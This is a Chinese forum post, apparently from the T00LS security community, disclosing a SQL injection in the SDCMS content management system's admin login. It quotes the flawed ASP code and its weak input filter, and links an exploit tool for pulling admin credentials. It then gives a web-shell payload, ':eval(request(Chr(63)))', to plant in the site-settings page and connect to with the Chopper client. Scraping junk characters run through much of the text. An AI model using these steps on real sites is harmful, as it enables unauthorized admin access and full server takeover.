作者:T00LS 鬼哥
8 \+ p! V) Q* w1 t3 l8 I漏洞文件:后台目录/index.asp
/ K7 f8 l$ a3 G6 x* b2 h9 g% I6 T- `+ [5 z9 G) B
Sub Check
M: A. }: j) ]9 T. ] Dim username,password,code,getcode,Rs
$ o/ A# K. |8 u8 P IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
0 f! G$ _; Y7 Z4 J6 i+ e username=FilterText(Trim(Request.Form("username")),1)
& e* P" }. B, z, T password=FilterText(Trim(Request.Form("password")),1)
3 q$ p( `% I& ]6 Z& r code=Trim(Request.Form("yzm"))1 @) E) a( B9 f: w4 ?
getcode=Session("SDCMSCode")1 ?9 O8 w/ ~4 O% N
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
O# a0 ?' `+ M IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
5 f8 q8 d% w3 n# c' M1 |9 q- @ IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
( X, b5 A0 ]2 r: L' Q$ e0 ~0 p. u IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
3 r2 d6 R! L1 ?! c0 n IF username="" or password="" Then, N, }, o$ U0 d" I
Echo "用户名或密码不能为空"ied
1 G% O3 P/ N) |! }2 E }1 s7 | Else. n6 Z) T" K! X
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
, [, Z$ W5 l% e: T' m& F% C7 J2 D IF Rs.Eof Then, w4 n0 ]8 T c+ U
AddLog username,GetIp,"登录失败",1
3 u$ J* H% Z. E0 g! d1 z Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会": g$ \8 `/ ]( B( k# l# K
Else! O% {. C; }- s/ B3 z
Add_Cookies "sdcms_id",Rs(0)
/ i/ Q6 d0 I& o, H+ C4 [ Add_Cookies "sdcms_name",username
, e S; e; `7 M, @8 L Add_Cookies "sdcms_pwd",Rs(2)
; Z" V1 U: [- d) K2 B9 z Add_Cookies "sdcms_admin",Rs(3). R- o, A; ^% m E/ S( T
Add_Cookies "sdcms_alllever",Rs(4)1 e$ }0 c. J( u1 }8 _, A D) R
Add_Cookies "sdcms_infolever",Rs(5)& k {' M, J4 N; Y' b: I
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# w3 ^. x. P6 T/ @7 k AddLog username,GetIp,"登录成功",1
; ~0 ~8 K5 \+ e2 z '自动删除30天前的Log记录& `& z7 S/ K/ P6 W
IF Sdcms_DataType Then$ h# G4 t) O; G( t/ Q
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")7 D6 H l9 [, B& Z
Else# L1 o( R: K# |" H
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
% ~: y( d) Y4 O2 j, F End IF/ _9 F0 u, ~) V
Go("sdcms_index.asp")
! G9 P; [0 K& ^+ b End IF" g4 H! R9 d4 X$ I6 b, D& q% @6 G
Rs.Close
Q4 B3 N0 C+ F& A Set Rs=Nothing
+ P1 R; U1 d& }" d3 ~8 B End IF
% f2 f( o+ j1 J; G S- NEnd Sub: O. w9 Y q/ ?, Q0 \0 v
/ X x! I& I! | r’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
/ ?6 [$ J2 \+ S/ @$ D3 b$ \
" l' {7 |, z$ i) y6 zFunction FilterText(ByVal t0,ByVal t1)
3 W% q! V/ ~* M& J5 Q* i IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
4 u+ s, V7 C. I& a! Z" c8 \6 s3 ] t0=Trim(t0)! K' J* C' z" m t5 L
Select Case t1* g! N a& f% Q3 M+ Q
Case "1"2 W/ P* p# T$ F4 s# h/ K8 n3 G
t0=Replace(t0,Chr(32),"")
8 T9 [+ l6 F: M7 c( n" h5 T t0=Replace(t0,Chr(13),"")7 C8 S8 x- S, i1 Z3 B" f( K
t0=Replace(t0,Chr(10)&Chr(10),"")) C8 N! O8 F+ M. U0 b( t' s3 s
t0=Replace(t0,Chr(10),"")
0 A/ e, {+ k& t" r& @% Y7 F Case "2"+ b) o# n& y( f$ y
t0=Replace(t0,Chr(8),"")'回格
/ O$ z X1 b; Z7 p4 S! }+ T3 N: x1 k t0=Replace(t0,Chr(9),"")'tab(水平制表符)5 `3 ^+ e! Q0 l2 }/ z
t0=Replace(t0,Chr(10),"")'换行
3 g' V' ?- j- S0 U% [1 Q' e$ R t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
* Q, F9 w: h' A7 I! U. Z t0=Replace(t0,Chr(12),"")'换页
- m0 f4 [ W' K8 c8 p t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合( g/ `6 B ~" F1 P* K4 d
t0=Replace(t0,Chr(22),"")% Z5 ^' M5 G4 e
t0=Replace(t0,Chr(32),"")'空格 SPACE' s8 O* [( B4 T; j9 T* f) |- q
t0=Replace(t0,Chr(33),"")'!
# z- U% b2 d& ~) U# d t0=Replace(t0,Chr(34),"")'"" x7 B, O4 v* I/ Z
t0=Replace(t0,Chr(35),"")'#
4 b7 g& r8 [. I; c6 b; Y# Y) _ d4 S t0=Replace(t0,Chr(36),"")'$
; p, o8 t# \ \; V t0=Replace(t0,Chr(37),"")'%
& r* k e& e0 S+ M t0=Replace(t0,Chr(38),"")'&
! y+ J9 S+ ]+ @. \* ~ t0=Replace(t0,Chr(39),"")''$ b. \1 h0 b5 K, {$ N0 R6 \- h
t0=Replace(t0,Chr(40),"")'(
2 F* n, o8 W l" ` t0=Replace(t0,Chr(41),"")')
( M; Y* U' N9 f% S1 N t0=Replace(t0,Chr(42),"")'*" e% P: ^1 [( _. b: j: r {
t0=Replace(t0,Chr(43),"")'+% m1 x: I' |0 U0 h
t0=Replace(t0,Chr(44),"")',
; d. E+ ]) r) g" Y! h X5 ? t0=Replace(t0,Chr(45),"")'-
6 K3 e7 x9 w$ J5 M' u" U t0=Replace(t0,Chr(46),"")'.
9 D: c9 |4 U- k5 M: ?; B t0=Replace(t0,Chr(47),"")'/
4 j+ E7 J \8 U% }4 p( v t0=Replace(t0,Chr(58),"")':2 X8 P8 F6 C- J1 T) a' T
t0=Replace(t0,Chr(59),"")';
0 ?7 ]0 C% }$ j t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>' X0 g7 ~4 h. B, e' R* B9 b
t0=Replace(t0,Chr(63),"")'?1 @ s9 p5 e6 v1 Q' O. x
t0=Replace(t0,Chr(64),"")'@2 _2 b2 ?1 v0 w/ R9 k
t0=Replace(t0,Chr(91),"")'\
& f9 V- y& S8 C# Q t0=Replace(t0,Chr(92),"")'\
/ [7 ?) X4 t, X& J t0=Replace(t0,Chr(93),"")']
* |. e: i! O% F4 I: s: o7 _ t0=Replace(t0,Chr(94),"")'^/ ~5 W. Z# r& V; Q
t0=Replace(t0,Chr(95),"")'_
: r! }, T/ |6 v& ? t0=Replace(t0,Chr(96),"")'`
7 S6 h' d3 y( U. j5 `7 F t0=Replace(t0,Chr(123),"")'{
4 l" P% h* Q2 _6 ~5 W& X t0=Replace(t0,Chr(124),"")'|
! R" [+ i$ D- P) l t0=Replace(t0,Chr(125),"")'}* c0 Z% q+ D; ^% @; d. _9 d
t0=Replace(t0,Chr(126),"")'~
; p7 l4 z3 ?: |7 T2 |4 F' @ Case Else
- p3 F3 d' J0 n8 t+ a7 a* r t0=Replace(t0, "&", "&")
0 Y8 x* r" S! v8 B! ?- c t0=Replace(t0, "'", "'")
2 }. E! u) [" F9 ?. L t0=Replace(t0, """", """) h% h9 E# W! ~
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
6 J! @! G |5 T5 W. P7 a$ b; ] End Select
5 _+ {8 o; t8 C4 h IF Instr(Lcase(t0),"expression")>0 Then$ D. o ?4 c. i+ M* D
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
5 p1 D% _0 k6 {( E/ N End If2 Z8 W3 L1 `8 W1 X- G @( j
FilterText=t0
4 {! K0 y* L6 {" P d7 qEnd Function
; U. o5 t( R i4 d) y9 S: q
! [' ?; \1 M" [, E6 D; H看到没。直接参数是1 只过滤' {( K |* r# ]) q
t0=Replace(t0,Chr(32)," ")+ ^8 J+ K" E' t2 d+ m; O6 N
t0=Replace(t0,Chr(13),"")' q% T( o7 s& O2 p {
t0=Replace(t0,Chr(10)&Chr(10),"
, ~2 b0 T7 a/ T")
, U" @. y+ ~) V# O1 k t0=Replace(t0,Chr(10),"
- L4 N) C& t9 e. D"); U# O0 R4 \* g1 V4 |9 q
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!7 H9 g7 P: R7 v8 e2 s0 C1 M
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
- L7 M' S8 v9 s6 b1 Q& T; b+ j
6 _* r, S. P' o3 y: ?. m; ^( |测试:
& y" q6 @1 J! A1 ~( s6 @; Y K8 J
3 X4 m% S9 L% Z现在输入工具上验证码,然后点OK
& A) k- K/ _1 z. u p4 H _$ e+ l7 W9 I, r; E h" m5 u: V
' F% y/ A. E/ {6 x
看到我们直接进入后台管理界面了,呵呵!+ h& U! y% C1 T4 _& F
$ E7 N6 |3 j- r4 p0 R
! J! |' E2 B' i( j& A$ ?1 O" \8 s( j3 \, b* B5 J9 V) R' u1 Z3 Y
这样直接进入后台了。。。。2 G7 H+ r( o' v
) J3 s) A* t) s9 c& h: ?8 g* r$ R
! c/ V5 E* k" J9 G! R) D1 `) A' k% a. _) d: ]9 B
SDCMS提权:
- i, F9 [4 K3 ]7 y J* c( e
( l9 H1 i+ H9 k& B5 ], c. v* y方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
; D% V4 M% Q: j9 k S# G8 ]
4 O" s$ s$ o- R4 O
3 f- i; m5 M, {0 O, w, `" l" `" q" @9 H/ b
OK,现在用菜刀连接下!
2 ~! n: I; f) {6 o+ ~3 ~& {
! H6 ?: f4 t* X& p& Z d) q
# R, A7 ^3 i: f' f4 A2 r! J% e( K
9 ?3 j+ O6 h* S. ~, J& x$ m) n( C" \. B" c
|
发表于 2012-11-9 20:57:02
收藏
支持
反对